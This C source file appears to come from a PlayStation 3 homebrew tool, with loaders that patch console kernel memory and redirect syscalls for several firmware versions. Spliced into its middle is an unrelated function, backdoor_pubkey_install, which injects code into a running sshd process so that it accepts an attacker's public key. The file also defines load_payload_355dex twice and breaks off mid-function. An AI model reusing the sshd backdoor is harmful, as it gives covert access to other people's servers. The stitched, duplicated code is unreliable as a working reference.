/*
 * Loader for firmware 3.41.
 *
 * Sequence: bring up the temporary LV2 memcpy syscall, copy the hermes payload
 * and the umount routine into LV2, write one quadword at 0x17CE0 and the
 * "SK1E" id at 0x4f0, tear the memcpy syscall down, clear the two BE-emu
 * mount words, call the payload at 0x7e0000 and finally apply the
 * sys_load_param version fix.  The order matters: lv2_memcpy is only usable
 * between install_lv2_memcpy() and remove_lv2_memcpy().
 *
 * mode is not read in this body.
 */
void load_payload_341(int mode)
{
    install_lv2_memcpy();

    /* WARNING!! It supports only payload with a size multiple of 8 */
    lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_OFFSET,
               (u64) payload_groove_hermes_bin,
               payload_groove_hermes_bin_size);
    lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_UMOUNT_OFFSET, // copy umount routine
               (u64) umount_341_bin,
               umount_341_bin_size);

    /* Single quadword written at 0x17CE0; its meaning is not documented here. */
    u64 data = 0x7C6903A64E800420ULL;
    lv2_memcpy(0x8000000000017CE0ULL, (u64) &data, 8);

    // copy the id
    /* 0x534B3145 is the ASCII string "SK1E"; the low 32 bits are zero here. */
    u64 id = 0x534B314500000000ULL;
    lv2_memcpy(0x80000000000004f0ULL, (u64) &id, 8);

    remove_lv2_memcpy();

    pokeq(0x80000000007EF000ULL, 0ULL); // BE Emu mount
    pokeq(0x80000000007EF220ULL, 0ULL);

    /* Give the pokes time to land before jumping into the payload. */
    usleep(250000);
    __asm__("sync");
    lv2_call_payload(0x80000000007e0000ULL);
    usleep(250000);

    /** Rancid-o: Fix 0x8001003C error (incorrect version in sys_load_param) - It is present in the new game updates **/
    _poke(0x2821FC, 0x386000007C6307B4);
    _poke32(0x282204, 0x4E800020);
}
/*
 * Loader for firmware 3.55 DEX (older payload layout: openhook at +0xF0,
 * sys8 descriptor at +0x398, sys36 descriptor at +0xC8, perms hook at
 * +0x2a8).
 *
 * Copies the sky payload into LV2 through the temporary memcpy syscall, then
 * applies the fixed-address patches and redirects syscalls 8 and 36 at the
 * payload.  mode is not read in this body.
 */
void load_payload_355dex(int mode)
{
    install_lv2_memcpy();

    /* WARNING!! It supports only payload with a size multiple of 8 */
    lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_OFFSET,
               (u64) payload_sky_355dex_bin,
               payload_sky_355dex_bin_size);

    remove_lv2_memcpy();

    /* BASIC PATCHES SYS36 */
    // by 2 anonymous people
    _poke32(0x059800, 0x60000000);
    PATCH_JUMP(0x059808, 0x598A0);
    _poke32(0x7EF60, 0x60000000);
    _poke32(0x7EF74, 0x60000000);
    _poke( 0x5978C, 0x63FF003D60000000); // fix 8001003D error "ori %r31, %r31, 0x3D\n nop\n"
    _poke32(0x59854, 0x3BE00000); // fix 8001003E error -- 3.55 ok in 0x055F64 "li %r31, 0"
    PATCH_JUMP(0x059858, 0x59764);

    /** Rancid-o: Fix 0x8001003C error (incorrect version in sys_load_param) - It is present in the new game updates **/
    _poke(0x2909E8, 0x386000007C6307B4);
    _poke32(0x2909F0, 0x4E800020);

    /*
    -002c3cf0 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d8 aa 1d |....|.#x|}.xK...|
    +002c3cf0 f8 01 00 b0 7c 9c 23 78 4b d4 01 88 4b d8 aa 1d |....|.#xK...K...|
    (openhook jump - 0x3E80)
    */
    PATCH_JUMP(0x2C8AB8, (PAYLOAD_OFFSET+0xF0));

    /* Syscall table slots are written with the LV2 address of the payload's descriptors. */
    _poke((u32) (SYSCALL_BASE + 8 * 8), 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x398)); // syscall_8_desc - sys8
    _poke((u32) (SYSCALL_BASE + 36 * 8), 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0xC8)); // syscall_map_open_desc - sys36

#ifdef CONFIG_USE_SYS8PERMH4
    PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x2a8));
#endif
}
/*
 * Older syscall36 loader for 3.55.
 *
 * Copies payload_syscall36_355_bin to 0x80000000002be4a0 through the
 * temporary memcpy syscall, then applies the fixed-address patches and
 * points the sys36 descriptor slot at the payload.  mode is not read in
 * this body.
 */
void load_payload_syscall36old(int mode)
{
    install_lv2_memcpy();

    /* WARNING!! It supports only payload with a size multiple of 8 */
    lv2_memcpy(0x80000000002be4a0ULL,
               (u64) payload_syscall36_355_bin,
               payload_syscall36_355_bin_size);

    remove_lv2_memcpy();

    /* by 2 anonymous people */
    _poke32(0x55f14, 0x60000000);
    _poke32(0x55f1c, 0x48000098);
    _poke32(0x7af68, 0x60000000);
    _poke32(0x7af7c, 0x60000000);
    _poke(0x55EA0, 0x63FF003D60000000); /* fix 8001003D error */
    _poke(0x55F64, 0x3FE080013BE00000); /* fix 8001003E error */
    _poke(0x2b3274, 0x4800B32C2BA30420); /* add a jump to payload2_start - hook */
    _poke(0x346690, 0x80000000002be570); /* syscall_map_open_desc - sys36 */
}
/*
 * Undo install_lv2_memcpy().
 *
 * Zeroes the twelve quadwords of the temporary stub at
 * 0x8000000000001820..0x8000000000001878 and puts the value saved in
 * restore_syscall back into syscall slot 9.  As in the original, the whole
 * write set is repeated 50 times with a 5 ms pause between rounds.
 */
static inline void remove_lv2_memcpy()
{
    const u64 stub_base = 0x8000000000001820ULL;
    const int stub_words = 12;          /* 0x1820 .. 0x1878 inclusive, 8 bytes each */
    int round;

    for (round = 0; round < 50; round++) {
        int w;

        /* Clear the stub in ascending address order, one quadword at a time. */
        for (w = 0; w < stub_words; w++) {
            pokeq(stub_base + (u64) (w * 8), 0x0ULL);
        }

        /* Hand syscall 9 back to whatever install_lv2_memcpy() found there. */
        _poke((u32) (SYSCALL_BASE + 9 * 8), restore_syscall);
        usleep(5000);
    }
}
/*
 * Install a temporary memcpy-style routine in LV2 and hook it to syscall 9.
 *
 * The original contents of syscall slot 9 are saved in restore_syscall so
 * remove_lv2_memcpy() can put them back.  Each of the 50 rounds writes, in
 * this order: the quadword 0x...1830 at 0x...1820, the quadword currently at
 * 0x...3000 at 0x...1828 (other loaders on this page call that value the
 * TOC), the ten code quadwords starting at 0x...1830, and then the slot-9
 * pointer; a 5 ms pause follows each round.
 */
static inline void install_lv2_memcpy()
{
    const u64 desc_addr = 0x8000000000001820ULL;
    const u64 code_addr = 0x8000000000001830ULL;
    static const u64 code[] = {
        0x282500004D820020ULL,      /* 0x1830 */
        0x38A5FFFF7CC428AEULL,      /* 0x1838 */
        0x7CC329AE7C0006ACULL,      /* 0x1840 */
        0x7CE32A1470E80003ULL,      /* 0x1848 */
        0x282500004082000CULL,      /* 0x1850 */
        0x7CE838504800000CULL,      /* 0x1858 */
        0x282800004082FFCCULL,      /* 0x1860 */
        0x7C0038AC7C0004ACULL,      /* 0x1868 */
        0x7C003FAC4C00012CULL,      /* 0x1870 */
        0x4BFFFFB800000000ULL,      /* 0x1878 */
    };
    const int code_words = (int) (sizeof code / sizeof code[0]);
    int round;

    /* Remember what syscall 9 pointed at before we overwrite it. */
    restore_syscall = peekq(SYSCALL_BASE + (u64) (9 * 8));

    for (round = 0; round < 50; round++) {
        int w;

        pokeq(desc_addr, code_addr);
        /* Re-read 0x3000 every round, exactly as the original does. */
        pokeq(desc_addr + 8, peekq(0x8000000000003000ULL));

        for (w = 0; w < code_words; w++) {
            pokeq(code_addr + (u64) (w * 8), code[w]);
        }

        _poke((u32) (SYSCALL_BASE + 9 * 8), desc_addr);
        usleep(5000);
    }
}
/*
 * Loader for firmware 3.55 CEX (older payload layout: payload at 0xef48,
 * sys36 descriptor at 0xF010, sys8 descriptor at 0xF2E0).
 *
 * Copies the sky payload in through the temporary memcpy syscall, sets the
 * global is_sky flag, then applies the fixed-address patches and points the
 * sys36 / sys8 descriptor slots at the payload.  mode is not read in this
 * body.
 */
void load_payload_355(int mode)
{
    install_lv2_memcpy();

    /* WARNING!! It supports only payload with a size multiple of 8 */
    lv2_memcpy(0x800000000000ef48ULL, (u64) payload_sky_355_bin, payload_sky_355_bin_size);

    is_sky = 1;

    remove_lv2_memcpy();

    /* BASIC PATCHES SYS36 */
    // by 2 anonymous people
    _poke32(0x55f14, 0x60000000);
    _poke32(0x55f1c, 0x48000098);
    _poke32(0x7af68, 0x60000000);
    _poke32(0x7af7c, 0x60000000);
    _poke(0x55EA0, 0x63FF003D60000000); // fix 8001003D error
    _poke(0x55F64, 0x3FE080013BE00000); // fix 8001003E error

    /*
    -002b3290 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d9 b4 11 |....|.#x|}.xK...|
    +002b3290 f8 01 00 b0 7c 9c 23 78 4b d5 bf 40 4b d9 b4 11 |....|.#xK..@K...|
    (openhook jump - 0xF1D8)
    */
    _poke(0x2b3298, 0x4bd5bda04bd9b411ULL); //jump hook

    /** Rancid-o: Fix 0x8001003C error (incorrect version in sys_load_param) - It is present in the new game updates **/
    _poke(0x28A404, 0x386000007C6307B4);
    _poke32(0x28A40C, 0x4E800020);

    /* 00346690 80 00 00 00 00 32 49 68 80 00 00 00 00 32 49 68 Ç....2IhÇ....2Ih */
    _poke(0x346690, 0x800000000000F010ULL); // syscall_map_open_desc - sys36
    _poke(0x3465b0, 0x800000000000F2E0ULL); // syscall_8_desc - sys8

#ifdef CONFIG_USE_SYS8PERMH4
    PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x2a8));
#endif
}
/*
 * Loader for CFW 4.30 DEX (Rebug).
 *
 * Sequence: (1) write the LV1 memory-protection patch via lv1poke, (2) fix up
 * the memcpy-syscall pointers, (3) install the temporary LV2 memcpy syscall
 * and copy the sky payload and the umount routine in, (4) save the current
 * syscall 8 slot in restore_syscall8[], write the "SK1E" id block, copy the
 * TOC into the payload and point syscall 8 at the payload's descriptor,
 * (5) remove the memcpy syscall and apply the fixed-address patches.
 * mode is not read in this body.
 */
void load_payload_430dex(int mode)
{
    //Remove lv2 memory protection ( only for cfw Rebug 4.30)
    // NOTE(review): the trailing ';' on the next line ends the if statement,
    // so the braced block below runs unconditionally regardless of the peekq
    // result.  The comment suggests the guard was intended — confirm before
    // changing, since it decides whether lv1poke() is reached on other CFWs.
    if(peekq(0x8000000000001748ULL) == 0x4400002238600000ULL); // if lv1poke is present...
    {
        // Thanks cyberskunk! :)
        lv1poke(0x370AA8 + 0,  0x0000000000000001ULL);
        lv1poke(0x370AA8 + 8,  0xe0d251b556c59f05ULL);
        lv1poke(0x370AA8 + 16, 0xc232fcad552c80d7ULL);
        lv1poke(0x370AA8 + 24, 0x65140cd200000000ULL);
    }

    //fix for memcpy syscall on use
    pokeq(0x800000000037E048ULL,0x8000000000001500ULL);
    pokeq(0x8000000000001500ULL,0x8000000000001510ULL);

    install_lv2_memcpy();

    /* WARNING!! It supports only payload with a size multiple of 8 */
    lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_OFFSET,
               (u64) payload_sky_430dex_bin,
               payload_sky_430dex_bin_size);
    lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_UMOUNT_OFFSET, // copy umount routine
               (u64) umount_430dex_bin,
               umount_430dex_bin_size);

    /* Address and current contents of syscall slot 8, presumably for a later restore. */
    restore_syscall8[0]= SYSCALL_BASE + 64ULL; // (8*8)
    restore_syscall8[1]= peekq(restore_syscall8[0]);

    u64 id[2]; // copy the id
    /* 0x534B3145 is ASCII "SK1E"; the low half carries the payload offset. */
    id[0]= 0x534B314500000000ULL | (u64) PAYLOAD_OFFSET;
    id[1] = SYSCALL_BASE + 64ULL; // (8*8)
    lv2_memcpy(0x80000000000004f0ULL, (u64) &id[0], 16);

    u64 inst8 = peekq(0x8000000000003000ULL); // get TOC
    lv2_memcpy(0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x28), (u64) &inst8, 8);

    inst8 = 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x20); // syscall_8_desc - sys8
    lv2_memcpy(SYSCALL_BASE + (u64) (8 * 8), (u64) &inst8, 8);

    usleep(1000);

    remove_lv2_memcpy();

    pokeq(0x80000000007EF000ULL, 0ULL);// BE Emu mount
    pokeq(0x80000000007EF220ULL, 0ULL);

    //Patches from webMAN
    pokeq(0x800000000029E034ULL, 0x4E80002038600000ULL );
    pokeq(0x800000000029E03CULL, 0x7C6307B44E800020ULL ); // fix 8001003C error
    pokeq(0x800000000005AA88ULL, 0x63FF003D60000000ULL ); // fix 8001003D error
    pokeq(0x800000000005AB4CULL, 0x3FE080013BE00000ULL ); // fix 8001003E error
    pokeq(0x800000000005AAF8ULL, 0x419E00D860000000ULL );
    pokeq(0x800000000005AB00ULL, 0x2F84000448000098ULL );
    pokeq(0x800000000005E4BCULL, 0x2F83000060000000ULL );
    pokeq(0x800000000005E4D0ULL, 0x2F83000060000000ULL );

    /* BASIC PATCHES SYS36 */
    // by 2 anonymous people
    /* Several of these overlap the webMAN pokeq writes above (e.g. 0x5AA88); they are kept in the original order. */
    _poke32(0x05AAFC, 0x60000000);
    PATCH_JUMP(0x05AB00, 0x5AB9C);
    _poke32(0x05E4C0, 0x60000000); // already set in E3 "nop"
    _poke32(0x05E4D4, 0x60000000); // already set in E3 "nop"
    _poke( 0x05AA88, 0x63FF003D60000000); // fix 8001003D error "ori %r31, %r31, 0x3D\n nop\n"
    _poke32(0x05AB50, 0x3BE00000); // fix 8001003E error -- 3.55 ok in 0x055F64 "li %r31, 0"
    PATCH_JUMP(0x05AB54, 0x5AA60); // fix E3 4.30 added error

    /** Rancid-o: Fix 0x8001003C error (incorrect version in sys_load_param) - It is present in the new game updates **/
    _poke(0x29E038, 0x386000007C6307B4);
    _poke32(0x29E038 + 8, 0x4E800020);

    /*
    -002c3cf0 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d8 aa 1d |....|.#x|}.xK...|
    +002c3cf0 f8 01 00 b0 7c 9c 23 78 4b d4 01 88 4b d8 aa 1d |....|.#xK...K...|
    (openhook jump - 0x3E80)
    */
    PATCH_JUMP(0x2DAE70, (PAYLOAD_OFFSET+0x30)); // patch openhook
    // _poke32(0x2DAE40, 0xF821FF61); // free openhook Rogero 4.30 (put "stdu %sp, -0xA0(%sp)" instead "b sub_2E9F98")

#ifdef CONFIG_USE_SYS8PERMH4
    PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x18));
#endif
}
/*
 * Loader for CFW 4.46 DEX.
 *
 * Same shape as load_payload_430dex(): LV1 memory-protection patch, temporary
 * LV2 memcpy syscall, copy the sky payload and umount routine, save the
 * syscall 8 slot in restore_syscall8[], write the "SK1E" id block, copy the
 * TOC into the payload, point syscall 8 at the payload, then apply the
 * 4.46-specific fixed-address patches.  mode is not read in this body.
 */
void load_payload_446dex(int mode)
{
    //Remove Lv2 memory protection
    /* Here the lv1poke block is unconditional (no peekq guard, unlike 4.30 DEX). */
    lv1poke(0x370AA8,      0x0000000000000001ULL);
    lv1poke(0x370AA8 + 8,  0xE0D251B556C59F05ULL);
    lv1poke(0x370AA8 + 16, 0xC232FCAD552C80D7ULL);
    lv1poke(0x370AA8 + 24, 0x65140CD200000000ULL);

    install_lv2_memcpy();

    /* WARNING!! It supports only payload with a size multiple of 8 */
    lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_OFFSET,
               (u64) payload_sky_446dex_bin,
               payload_sky_446dex_bin_size);
    lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_UMOUNT_OFFSET, // copy umount routine
               (u64) umount_446dex_bin,
               umount_446dex_bin_size);

    /* Address and current contents of syscall slot 8, presumably for a later restore. */
    restore_syscall8[0]= SYSCALL_BASE + 64ULL; // (8*8)
    restore_syscall8[1]= peekq(restore_syscall8[0]);

    u64 id[2]; // copy the id
    /* 0x534B3145 is ASCII "SK1E"; the low half carries the payload offset. */
    id[0]= 0x534B314500000000ULL | (u64) PAYLOAD_OFFSET;
    id[1] = SYSCALL_BASE + 64ULL; // (8*8)
    lv2_memcpy(0x80000000000004f0ULL, (u64) &id[0], 16);

    u64 inst8 = peekq(0x8000000000003000ULL); // get TOC
    lv2_memcpy(0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x28), (u64) &inst8, 8);

    inst8 = 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x20); // syscall_8_desc - sys8
    lv2_memcpy(SYSCALL_BASE + (u64) (8 * 8), (u64) &inst8, 8);

    usleep(1000);

    remove_lv2_memcpy();

    pokeq(0x80000000007EF000ULL, 0ULL);// BE Emu mount
    pokeq(0x80000000007EF220ULL, 0ULL);

    /* BASIC PATCHES SYS36 */
    // by 2 anonymous people
    _poke32(0x59A4C, 0x60000000); // done
    PATCH_JUMP(0x59A54, 0x59AEC); // done
    _poke32(0x5D410, 0x60000000); // done
    _poke32(0x5D424, 0x60000000); // done
    _poke( 0x599D8, 0x63FF003D60000000); // fix 8001003D error "ori %r31, %r31, 0x3D\n nop\n" done
    _poke32(0x59AA0, 0x3BE00000); // fix 8001003E error -- 3.55 ok in 0x055F64 "li %r31, 0" done
    // PATCH_JUMP(0x, 0x56098);

    /** Rancid-o: Fix 0x8001003C error (incorrect version in sys_load_param) - It is present in the new game updates **/
    _poke(0x29D970, 0x386000007C6307B4); // is still patched in rebug, anyway..
    _poke32(0x29D970 + 8, 0x4E800020);

    /*
    -002c3cf0 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d8 aa 1d |....|.#x|}.xK...|
    +002c3cf0 f8 01 00 b0 7c 9c 23 78 4b d4 01 88 4b d8 aa 1d |....|.#xK...K...|
    (openhook jump - 0x3E80)
    */
    PATCH_JUMP(0x2DBC80, (PAYLOAD_OFFSET+0x30)); // patch openhook
    // _poke32(0x2C4290, 0xF821FF61); // free openhook Rogero 4.30 (put "stdu %sp, -0xA0(%sp)" instead "b sub_2E9F98") - is still present in Rogero 4.41?

#ifdef CONFIG_USE_SYS8PERMH4
    PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x18));
#endif
}
/*
 * Loader for firmware 3.55 DEX, newer payload layout (openhook at +0x30,
 * sys8 descriptor at +0x20, perms hook at +0x18).
 *
 * Unlike the other loaders on this page this one derives the syscall slot
 * from SYSCALL_SK1E instead of hard-coding slot 8.  Sequence: temporary LV2
 * memcpy syscall, copy the sky payload and umount routine, save the
 * SYSCALL_SK1E slot in restore_syscall8[], write the "SK1E" id block, copy
 * the TOC into the payload, point the slot at the payload, remove the memcpy
 * syscall, then apply the fixed-address patches.  mode is not read here.
 */
void load_payload_355dex(int mode)
{
    install_lv2_memcpy();

    /* WARNING!! It supports only payload with a size multiple of 8 */
    lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_OFFSET,
               (u64) payload_sky_355dex_bin,
               payload_sky_355dex_bin_size);
    lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_UMOUNT_OFFSET, // copy umount routine
               (u64) umount_355dex_bin,
               umount_355dex_bin_size);

    /* Address and current contents of the SYSCALL_SK1E slot, presumably for a later restore. */
    restore_syscall8[0]= SYSCALL_BASE + (u64) (SYSCALL_SK1E * 8ULL); // (8*8)
    restore_syscall8[1]= peekq(restore_syscall8[0]);

    u64 id[2]; // copy the id
    /* 0x534B3145 is ASCII "SK1E"; the low half carries the payload offset. */
    id[0]= 0x534B314500000000ULL | (u64) PAYLOAD_OFFSET;
    id[1] = SYSCALL_BASE + (u64) (SYSCALL_SK1E * 8ULL); // (8*8)
    lv2_memcpy(0x80000000000004f0ULL, (u64) &id[0], 16);

    u64 inst8 = peekq(0x8000000000003000ULL); // get TOC
    lv2_memcpy(0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x28), (u64) &inst8, 8);

    inst8 = 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x20); // syscall_8_desc - sys8
    lv2_memcpy(SYSCALL_BASE + (u64) (SYSCALL_SK1E * 8ULL), (u64) &inst8, 8);

    usleep(1000);

    remove_lv2_memcpy();

    pokeq(0x80000000007EF000ULL, 0ULL); // BE Emu mount
    pokeq(0x80000000007EF220ULL, 0ULL);

    /* BASIC PATCHES SYS36 */
    // by 2 anonymous people
    _poke32(0x059800, 0x60000000);
    PATCH_JUMP(0x059808, 0x598A0);
    _poke32(0x7EF60, 0x60000000);
    _poke32(0x7EF74, 0x60000000);
    _poke( 0x5978C, 0x63FF003D60000000); // fix 8001003D error "ori %r31, %r31, 0x3D\n nop\n"
    _poke32(0x59854, 0x3BE00000); // fix 8001003E error -- 3.55 ok in 0x055F64 "li %r31, 0"
    PATCH_JUMP(0x059858, 0x59764);

    /** Rancid-o: Fix 0x8001003C error (incorrect version in sys_load_param) - It is present in the new game updates **/
    _poke(0x2909E8, 0x386000007C6307B4);
    _poke32(0x2909F0, 0x4E800020);

    /*
    -002c3cf0 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d8 aa 1d |....|.#x|}.xK...|
    +002c3cf0 f8 01 00 b0 7c 9c 23 78 4b d4 01 88 4b d8 aa 1d |....|.#xK...K...|
    (openhook jump - 0x3E80)
    */
    PATCH_JUMP(0x2C8AB8, (PAYLOAD_OFFSET+0x30));

#ifdef CONFIG_USE_SYS8PERMH4
    PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x18));
#endif
}
/*
 * Install the public-key hook into the target sshd process described by ctx.
 *
 * Steps, as visible below:
 *   1. Copy hook_pubkey_bin into a local buffer; its import table starts 8
 *      bytes in and slot 0 receives ctx->config_addr.
 *   2. Resolve each entry of `signatures` to an address in the target —
 *      either by debug string, or (new key system, entries 2..4) by locating
 *      PLT call pairs — and store it in the import slot named by import_id.
 *   3. Read the library address of BN_cmp through its GOT entry into slot 6.
 *   4. Collect every cached call whose destination is signatures[0].addr
 *      (key_allowed) into user_key_allowed2_calls[].
 *   5. Map a page near the first such call, rewrite each call's rel32 to
 *      land there, write the hook, and copy `pubkey` over every 4-byte
 *      0xAA 0xBB 0xCC 0xDD marker found in the hook image.
 *
 * error() is treated as fatal by the control flow below (no return after it);
 * that is inferred from usage, not visible here.  evil_bin is never freed.
 */
void backdoor_pubkey_install(inject_ctx *ctx, char *pubkey)
{
    /* Field order matches usage below: import_id, name, debug string, resolved addr. */
    signature signatures[]={
        { 0x1, "key_allowed", "trying public key file %s", 0 },
        { 0x2, "restore_uid", "restore_uid: %u/%u" , 0 },
        { 0x3, "key_new" , "key_new: RSA_new failed" , 0 },
        { 0x4, "key_read" , "key_read: type mismatch: ", 0 },
        { 0x5, "key_free" , "key_free: " , 0 },
    };
    u8 *evil_bin;
    int i;
    u32 callcache_total, num_key_allowed2_calls=0;
    char line[255];
    callcache_entry *callcache, *entry;
    u64 user_key_allowed2_calls[MAX_KEY_ALLOWED_CALLS];   /* NOTE(review): no bound check against MAX_KEY_ALLOWED_CALLS when filling this */
    u64 diff=0, hole_addr=0, *import_table;

    /* NOTE(review): malloc result is not checked before use. */
    evil_bin = malloc(hook_pubkey_bin_len);
    import_table = (u64*)(evil_bin + 8);
    memcpy(evil_bin, hook_pubkey_bin, hook_pubkey_bin_len);
    import_table[0] = ctx->config_addr;

    for(i = 0; i < sizeof(signatures) / sizeof(signature); i++) {
        if (ctx->uses_new_key_system == 0 || i < 2) {
            /* Legacy path, and always for key_allowed / restore_uid. */
            signatures[i].addr = sub_by_debugstr(ctx, signatures[i].str);
        } else {
            u64 f_dsa_new, f_bn_new, p_dsa_new, p_bn_new, callpair, callpair_b, p_rsa_free, p_dsa_free;

            switch(i) {
                case 2: // key_new
                    f_dsa_new = resolve_reloc( ctx->rela, ctx->rela_sz, ctx->dynsym, ctx->dynsym_sz, (char*)ctx->dynstr, "DSA_new" );
                    f_bn_new  = resolve_reloc( ctx->rela, ctx->rela_sz, ctx->dynsym, ctx->dynsym_sz, (char*)ctx->dynstr, "BN_new" );

                    info("DSA_new@got = 0x%lx", f_dsa_new);
                    info("BN_new@got = 0x%lx", f_bn_new);

                    p_dsa_new = find_plt_entry(ctx, ctx->elf_base + f_dsa_new);
                    p_bn_new  = find_plt_entry(ctx, ctx->elf_base + f_bn_new);

                    info("DSA_new@plt = 0x%lx", p_dsa_new);
                    info("BN_new@plt = 0x%lx", p_bn_new);

                    callpair = find_callpair(p_dsa_new, p_bn_new);
                    info("yo we got a callpair for (DSA_new, BN_new) -> 0x%lx", callpair);

                    signatures[i].addr = find_entrypoint(callpair);
                    break;

                case 3: // key_read
                    signatures[i].addr = prevcall_by_debugstr(ctx, "user_key_allowed: advance: ");
                    break;

                case 4: // key_free
                    p_rsa_free = find_plt_entry(ctx, ctx->elf_base + resolve_reloc( ctx->rela, ctx->rela_sz, ctx->dynsym, ctx->dynsym_sz, (char*)ctx->dynstr, "RSA_free" ));
                    p_dsa_free = find_plt_entry(ctx, ctx->elf_base + resolve_reloc( ctx->rela, ctx->rela_sz, ctx->dynsym, ctx->dynsym_sz, (char*)ctx->dynstr, "DSA_free" ));

                    info("RSA_free@plt = 0x%lx", p_rsa_free);
                    info("DSA_free@plt = 0x%lx", p_dsa_free);

                    /* Try both orders of the pair before giving up. */
                    callpair_b = find_callpair(p_rsa_free, p_dsa_free);
                    if(callpair_b == 0) {
                        callpair_b = find_callpair(p_dsa_free, p_rsa_free);
                    }

                    if(callpair_b != 0) {
                        info("found callpair @ 0x%lx .. finding entrypoint..", callpair_b);
                        signatures[i].addr = find_entrypoint_inner(callpair_b, 3);
                    } else {
                        error("could not find valid callpair to derive key_free()");
                    }
                    break;

                default:
                    error("WTF just happened!");
                    break;
            }
        }

        if (signatures[i].addr == 0) {
            error("%s not found :(\n", signatures[i].name);
        }

        sprintf(line, "%s\t\t= \x1b[37m0x%lx", signatures[i].name, signatures[i].addr - ctx->elf_base );
        import_table[ signatures[i].import_id ] = signatures[i].addr;
        sprintf( line+strlen(line), " .. patched at offset 0x%lx in import table!", (signatures[i].import_id*8) & 0xffff );
        info(line);
    }

    /* BN_cmp goes through its GOT entry: read the pointer the target has there. */
    u64 f_BN_cmp = resolve_reloc(ctx->rela, ctx->rela_sz, ctx->dynsym, ctx->dynsym_sz, (char*)ctx->dynstr, "BN_cmp");
    info("BN_cmp@got = 0x%lx", f_BN_cmp);

    u64 l_BN_cmp;
    _peek(ctx->pid, ctx->elf_base + f_BN_cmp, &l_BN_cmp, 8);
    info("BN_cmp@lib = 0x%lx", l_BN_cmp);
    import_table[6] = l_BN_cmp;

    callcache = get_callcache();
    callcache_total = get_callcachetotal();

    for(i=0; i<callcache_total; i++) {
        entry = &callcache[i];
        if (entry->dest == signatures[0].addr && entry->type == CALLCACHE_TYPE_CALL) {
            info("found a 'call user_key_allowed' @ 0x%lx", entry->addr);
            user_key_allowed2_calls[num_key_allowed2_calls] = entry->addr;
            num_key_allowed2_calls++;
        }
    }

    if (num_key_allowed2_calls == 0)
        error("no call to user_key_allowed2 found :(");

    hole_addr = find_hole(ctx, user_key_allowed2_calls[0], 0x1000);
    if (hole_addr == 0) {
        error("unable to find neighborly hole.");
    }

    info("found usable hole @ 0x%lx", hole_addr);
    info2("entering critical phase");

    _mmap( ctx, (void*)hole_addr, 0x1000, PROT_READ| PROT_WRITE | PROT_EXEC, MAP_ANONYMOUS | MAP_SHARED | MAP_FIXED, 0, 0 );

    for(i=0; i<num_key_allowed2_calls; i++) {
        /* rel32 displacement from the end of the 5-byte call to hole_addr. */
        diff = 0x100000000-(user_key_allowed2_calls[i]-hole_addr)-5;

        info( "building a bridge [0x%lx->0x%lx] .. opcode = [E8 %02X %02X %02X %02X]",
              user_key_allowed2_calls[i], hole_addr,
              diff & 0xff, (diff>>8)&0xff, (diff>>16)&0xff, (diff>>24)&0xff );

        _poke(ctx->pid, user_key_allowed2_calls[i]+1, &diff, 4);
    }

    _poke(ctx->pid, hole_addr, evil_bin, hook_pubkey_bin_len);

    /* Every 4-byte marker in the image gets the key text (strlen bytes, no NUL). */
    for(i=0; i<hook_pubkey_bin_len; i++) {
        if (memcmp(evil_bin+i, "\xaa\xbb\xcc\xdd", 4) == 0) {
            info("inserting pubkey at offset %x in payload", i);
            _poke(ctx->pid, hole_addr+i, pubkey, strlen(pubkey));
        }
    }

    info("poked evil_bin to 0x%lx.", hole_addr);
}
/*
 * Loader for CFW 4.70 DEX (Rebug).
 *
 * The LV1 memory-protection block is commented out here (not needed on 4.70
 * per the author).  Sequence: temporary LV2 memcpy syscall, copy the sky
 * payload and umount routine, save the syscall 8 slot in restore_syscall8[],
 * write the "SK1E" id block, copy the TOC into the payload, point syscall 8
 * at the payload, remove the memcpy syscall, then the fixed-address patches.
 * The webMAN pokeq set is kept commented as reference.  mode is not read.
 */
void load_payload_470dex (int mode)
{
    /*
    //Remove Lv2 memory protection, NOT needed for REBUG 4.70
    lv1poke(0x370F28 + 0,  0x0000000000000001ULL); // Original: 0x0000000000351FD8ULL
    lv1poke(0x370F28 + 8,  0xE0D251B556C59F05ULL); // Original: 0x3B5B965B020AE21AULL
    lv1poke(0x370F28 + 16, 0xC232FCAD552C80D7ULL); // Original: 0x7D6F60B118E2E81BULL
    lv1poke(0x370F28 + 24, 0x65140CD200000000ULL); // Original: 0x315D8B7700000000ULL
    */

    install_lv2_memcpy();

    /* WARNING!! It supports only payload with a size multiple of 8 */
    lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_OFFSET,
               (u64) payload_sky_470dex_bin,
               payload_sky_470dex_bin_size);
    lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_UMOUNT_OFFSET, // copy umount routine
               (u64) umount_470dex_bin,
               umount_470dex_bin_size);

    /* Address and current contents of syscall slot 8, presumably for a later restore. */
    restore_syscall8[0]= SYSCALL_BASE + 64ULL; // (sc8*8)
    restore_syscall8[1]= peekq(restore_syscall8[0]);

    u64 id[2]; // copy the id
